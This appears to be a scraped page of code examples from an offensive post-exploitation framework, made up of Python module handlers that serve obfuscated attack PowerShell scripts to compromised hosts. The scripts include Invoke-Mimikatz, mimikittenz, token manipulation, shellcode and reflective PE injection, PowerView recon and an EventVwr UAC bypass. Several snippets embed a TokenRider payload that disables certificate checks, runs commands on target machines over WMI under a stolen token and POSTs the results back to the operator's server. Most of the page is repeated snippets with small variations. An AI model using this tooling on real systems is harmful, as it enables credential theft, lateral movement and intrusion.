def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            #Command to execute on the target system(s)
            command_to_execute = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            #This will get executed in the process that was created with the impersonated token
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(
                server=context.server,
                addr=context.localip,
                port=context.server_port,
                targets=self.target_computers,
                command=command_to_execute)

            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 2
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    get_ps_script(
                        'Powersploit/CodeExecution/Invoke-Shellcode.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            #Target has the shellcode, stop tracking the host
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 3
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            #Command to execute on the target system(s)
            command_to_execute  = 'cmd.exe /c {}'.format(self.command)
            #context.log.debug(command_to_execute)

            #This will get executed in the process that was created with the impersonated token
            elevated_ps_command = '''
            [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
            function Send-POSTRequest {{
                [CmdletBinding()]
                Param (
                    [string] $data
                )
                $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
                $request.Method = 'POST';
                $request.ContentType = 'application/x-www-form-urlencoded';
                $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
                $request.ContentLength = $bytes.Length;
                $requestStream = $request.GetRequestStream();
                $requestStream.Write( $bytes, 0, $bytes.Length );
                $requestStream.Close();
                $request.GetResponse();
            }}

            $post_output = "";
            $targets = @({targets});
            foreach ($target in $targets){{
                try{{
                    Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $target -ArgumentList "{command}";
                    $post_output = $post_output + "Executed command on $target! `n";
                }} catch {{
                    $post_output = $post_output + "Error executing command on $target $_.Exception.Message `n";
                }}
            }}
            Send-POSTRequest $post_output'''.format(server=context.server, 
                                                    addr=context.localip, 
                                                    port=context.server_port,
                                                    targets=self.target_computers,
                                                    command=command_to_execute)

            request.wfile.write(elevated_ps_command)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 4
0
    def payload(self, context, command):
        '''
        Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, 
        update the base64 encoded binary in the Invoke-Mimikatz.ps1 script 
        and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.

        Here we call the updated PowerShell script instead of PowerSploits version
        '''

        with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
            return obfs_ps_script(ps_script.read())
Esempio n. 5
0
    def payload(self, context, command):

        '''
        Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, 
        update the base64 encoded binary in the Invoke-Mimikatz.ps1 script 
        and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.

        Here we call the updated PowerShell script instead of PowerSploits version
        '''

        with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
            return obfs_ps_script(ps_script.read())
Esempio n. 6
0
    def on_request(self, context, request):
        if 'PowerView.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('Recon/PowerView.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 7
0
    def on_request(self, context, request):
        if 'PowerView.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 8
0
    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 9
0
    def on_request(self, context, request):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 10
0
    def on_request(self, context, request):
        if 'Invoke-mimikittenz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 11
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1'),
                      'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 13
0
    def on_request(self, context, request, launcher, payload):
        if 'Invoke-TokenManipulation.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        elif 'TokenRider.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            #Command to execute on the target system(s)
            request.wfile.write(payload)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 14
0
    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()
            '''
            Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, 
            update the base64 encoded binary in the Invoke-Mimikatz.ps1 script 
            and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.

            Here we call the updated PowerShell script instead of PowerSploits version
            '''

            with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 15
0
    def on_request(self, context, request, launcher, payload):
        if "Invoke-TokenManipulation.ps1" == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script("PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1"), "r") as ps_script:
                ps_script = obfs_ps_script(ps_script.read())
                request.wfile.write(ps_script)

        elif "TokenRider.ps1" == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            # Command to execute on the target system(s)
            request.wfile.write(payload)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 16
0
    def on_request(self, context, request):
        if 'Invoke-Mimikatz.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            '''
            Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version, 
            update the base64 encoded binary in the Invoke-Mimikatz.ps1 script 
            and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.

            Here we call the updated PowerShell script instead of PowerSploits version
            '''

            with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 17
0
    def on_request(self, context, request):
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('CodeExecution/Invoke-ReflectivePEInjection.ps1'), 'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.stop_tracking_host()

            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 18
0
    def on_request(self, context, request):
        if 'Invoke-Shellcode.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(get_ps_script('CodeExecution/Invoke-Shellcode.ps1') ,'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.shellcode_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(self.shellcode_path, 'rb') as shellcode:
                request.wfile.write(shellcode.read())

            #Target has the shellcode, stop tracking the host
            request.stop_tracking_host()

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 19
0
    def on_request(self, context, request):
        if 'Invoke-ReflectivePEInjection.ps1' == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            with open(
                    get_ps_script(
                        'CodeExecution/Invoke-ReflectivePEInjection.ps1'),
                    'r') as ps_script:
                ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                request.wfile.write(ps_script)

        elif os.path.basename(self.payload_path) == request.path[1:]:
            request.send_response(200)
            request.end_headers()

            request.stop_tracking_host()

            with open(self.payload_path, 'rb') as payload:
                request.wfile.write(payload.read())

        else:
            request.send_response(404)
            request.end_headers()
Esempio n. 20
0
 def payload(self, context, command):
     with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'), 'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 21
0
 def payload(self, context, command):
     with open(get_ps_script('Invoke-EventVwrBypass.ps1'), 'r') as ps_script:
         return ps_script.read()
Esempio n. 22
0
 def payload(self, context, command):
     with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'),
               'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 23
0
 def payload(self, context, command):
     with open(
             get_ps_script(
                 'PowerSploit/CodeExecution/Invoke-Shellcode.ps1'),
             'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 24
0
 def payload(self, context, command):
     with open(get_ps_script('PowerSploit/CodeExecution/Invoke-Shellcode.ps1'), 'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 25
0
 def payload(self, context, command):
     with open(get_ps_script('PowerSploit/Recon/PowerView.ps1'),
               'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 26
0
 def payload(self, context, command):
     with open(
             get_ps_script(
                 'PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'),
             'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 27
0
 def payload(self, context, command):
     with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 28
0
 def payload(self, context, command):
     with open(get_ps_script("mimikittenz/Invoke-mimikittenz.ps1"), "r") as ps_script:
         return obfs_ps_script(ps_script.read())
Esempio n. 29
0
 def payload(self, context, command):
     with open(get_ps_script('PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1'), 'r') as ps_script:
         return obfs_ps_script(ps_script.read())